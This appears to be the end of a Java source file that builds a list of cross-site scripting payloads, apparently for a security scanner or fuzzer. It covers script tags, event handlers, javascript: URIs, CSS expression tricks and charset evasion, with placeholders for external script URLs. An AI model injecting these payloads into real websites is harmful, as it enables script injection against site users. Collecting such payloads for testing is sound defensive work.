                + "<div id=\"x\">x</div> <xml:namespace prefix=\"t\"> <import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;\">\n"
                + "<script>%(payload)s</script>\n"
                + "<script src=%(jscript)s></script>\n"
                + "<script language='javascript' src='%(jscript)s'></script>\n"
                + "<script>javascript:alert(1)</script>\n"
                + "<IMG SRC=\"javascript:javascript:alert(1);\">\n"
                + "<IMG SRC=javascript:javascript:alert(1)>\n"
                + "<IMG SRC=`javascript:javascript:alert(1)`>\n"
                + "<SCRIPT SRC=%(jscript)s?<B>\n"
                + "<FRAMESET><FRAME SRC=\"javascript:javascript:alert(1);\"></FRAMESET>\n"
                + "<BODY ONLOAD=javascript:alert(1)>\n"
                + "<BODY ONLOAD=javascript:javascript:alert(1)>\n"
                + "<IMG SRC=\"jav ascript:javascript:alert(1);\">\n"
                + "<BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>\n"
                + "<SCRIPT/SRC=\"%(jscript)s\"></SCRIPT>\n"
                + "<<SCRIPT>%(payload)s//<</SCRIPT>\n"
                + "<IMG SRC=\"javascript:javascript:alert(1)\"\n"
                + "<iframe src=%(scriptlet)s <\n"
                + "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:javascript:alert(1);\">\n"
                + "<IMG DYNSRC=\"javascript:javascript:alert(1)\">\n"
                + "<IMG LOWSRC=\"javascript:javascript:alert(1)\">\n"
                + "<BGSOUND SRC=\"javascript:javascript:alert(1);\">\n"
                + "<BR SIZE=\"&{javascript:alert(1)}\">\n"
                + "<LAYER SRC=\"%(scriptlet)s\"></LAYER>\n"
                + "<LINK REL=\"stylesheet\" HREF=\"javascript:javascript:alert(1);\">\n"
                + "<STYLE>@import'%(css)s';</STYLE>\n"
                + "<META HTTP-EQUIV=\"Link\" Content=\"<%(css)s>; REL=stylesheet\">\n"
                + "<XSS STYLE=\"behavior: url(%(htc)s);\">\n"
                + "<STYLE>li {list-style-image: url(\"javascript:javascript:alert(1)\");}</STYLE><UL><LI>XSS\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:javascript:alert(1);\">\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:javascript:alert(1);\">\n"
                + "<IFRAME SRC=\"javascript:javascript:alert(1);\"></IFRAME>\n"
                + "<TABLE BACKGROUND=\"javascript:javascript:alert(1)\">\n"
                + "<TABLE><TD BACKGROUND=\"javascript:javascript:alert(1)\">\n"
                + "<DIV STYLE=\"background-image: url(javascript:javascript:alert(1))\">\n"
                + "<DIV STYLE=\"width:expression(javascript:alert(1));\">\n"
                + "<IMG STYLE=\"xss:expr/*XSS*/ession(javascript:alert(1))\">\n"
                + "<XSS STYLE=\"xss:expression(javascript:alert(1))\">\n"
                + "<STYLE TYPE=\"text/javascript\">javascript:alert(1);</STYLE>\n"
                + "<STYLE>.XSS{background-image:url(\"javascript:javascript:alert(1)\");}</STYLE><A CLASS=XSS></A>\n"
                + "<STYLE type=\"text/css\">BODY{background:url(\"javascript:javascript:alert(1)\")}</STYLE>\n"
                + "<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->\n"
                + "<BASE HREF=\"javascript:javascript:alert(1);//\">\n"
                + "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"%(scriptlet)s\"></OBJECT>\n"
                + "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>\n"
                + "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"%(htc)s\"><xss:xss>XSS</xss:xss></HTML>\"\"\",\"XML namespace.\"),(\"\"\"<XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:javascript:alert(1)\"&gt;</B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>\n"
                + "<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;\"></BODY></HTML>\n"
                + "<SCRIPT SRC=\"%(jpg)s\"></SCRIPT>\n"
                + "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-\n"
                + "<form id=\"test\" /><button form=\"test\" formaction=\"javascript:javascript:alert(1)\">X\n"
                + "<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>\n"
                + "<P STYLE=\"behavior:url('#default#time2')\" end=\"0\" onEnd=\"javascript:alert(1)\">\n"
                + "<STYLE>@import'%(css)s';</STYLE>\n"
                + "<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>\n"
                + "<meta charset= \"x-imap4-modified-utf7\"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>\n"
                + "<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>\n"
                + "<style onreadystatechange=javascript:javascript:alert(1);></style>\n"
                + "<?xml version=\"1.0\"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>\n"
                + "<embed code=%(scriptlet)s></embed>\n"
                + "<embed code=javascript:javascript:alert(1);></embed>\n"
                + "<embed src=%(jscript)s></embed>\n"
                + "<frameset onload=javascript:javascript:alert(1)></frameset>\n"
                + "<object onerror=javascript:javascript:alert(1)>";

        for (String x : payload.split("\n")) {
            if (x != null || !x.equals("")) {
                list.add(x);
            }
        }
        return list;
    }

}
